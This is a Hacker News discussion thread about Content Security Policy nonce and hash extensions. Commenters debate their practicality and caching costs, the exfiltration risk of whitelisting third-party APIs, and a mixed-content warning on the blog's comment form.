Hacker News new | past | comments | ask | show | jobs | submit login
Content Security Policy (CSP) for the web we have (blog.mozilla.org)
24 points by hachiya on Oct 4, 2014 | hide | past | favorite | 7 comments



I like the original CSP and while I don't take issue with them adding these extensions both seem quirky to use...

So with nonce based whitelisting, you really need your JavaScript blocks generated from code behind/a framework. Since they have to be rotated every single request, it would only really be efficient to utilise it when the entire page is re-generated every request already.

With the hash blocks, first off generating the hashes will be pure hell without amazing tooling, and also the devil is really in the details for exactly what the hash represents (e.g. the literal block as written, the block trimmed, the block with all whitespace removed, etc).

If it is the literal block as written then that is going to break a LOT. A single extra whitespace? Broken. The source changed from UNIX to Windows newlines, broken. ASCII to UNICODE conversion? broken. Code style applied? Super-broken, and so on.

So with both nonce AND hash based approach it seems like it has to be totally automated, and now you've effectively turned all HTML pages from "static" content into dynamic content (since in both case you're likely generating the CSP elements each "compile").

Honestly these seem like such a PITA to use, that they don't really make it easier for existing code bases to move to CSP, since a lot of work to find and modify every single JavaScript block (and then the CSP block) would be quite an undertaking. If I was going to do that I'd just move it all to *.JS files and use CSP 1.0.


you're definitely going to need tooling for hash blocks, but i don't think it needs to be particilarly sophisticated or amazing. I think you could provide pretty generic support in a couple dozen lines of php, or easily add it to any static site generation tool like jekyll. but, yeah, if you are purely manually writing static files in a yext editor, its going to be error prone.

Still trying to wrap my head around the nonce -- it seems like maybe it precludes just about any kind of caching, including CDNs? That seems like kind of a non starter.

and yeah, even though they start out talking about legacy site issues, both of these techniques seem to me more useful when you actually have some design reason to prefer or need inline scripts (there are a few), and less likely to be useful as a conveninet solution for a legacy site you don't want to change much.


This is great, but every time I read CSP as Communicating Sequential Processes. Funny thing about cultural contexts.


One of the reasons preventing XSS is important is preventing data exfiltration.

One of the things I see a lot of people doing is whitelisting in their CSP rules 3rd party APIs like Google Analytics. Well...these can be used to exfiltrate data too...

There are a TON of 3rd party APIs that can't be safely whitelisted with CSP. A whitelist for GA or Stripe on all pages means you are poking holes in your CSP....And poking holes in anything usually has issues associated with it.


Not particularly relevant, but still ironic that this page about CSP gives me a mixed content warning.


The mixed content warning only happens in Chrome. They just need to change the comment form's action:

    <form id="comment-form" action="http://blog.mozilla.org/security/wp-comments-post.php" method="post">
In this case, the potential to transmit unencrypted data exists, so Chrome warns. Firefox seems to be oblivious to the issue.


Firefox will warn when you try to submit the form.

Filed https://bugzilla.mozilla.org/show_bug.cgi?id=1077880.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: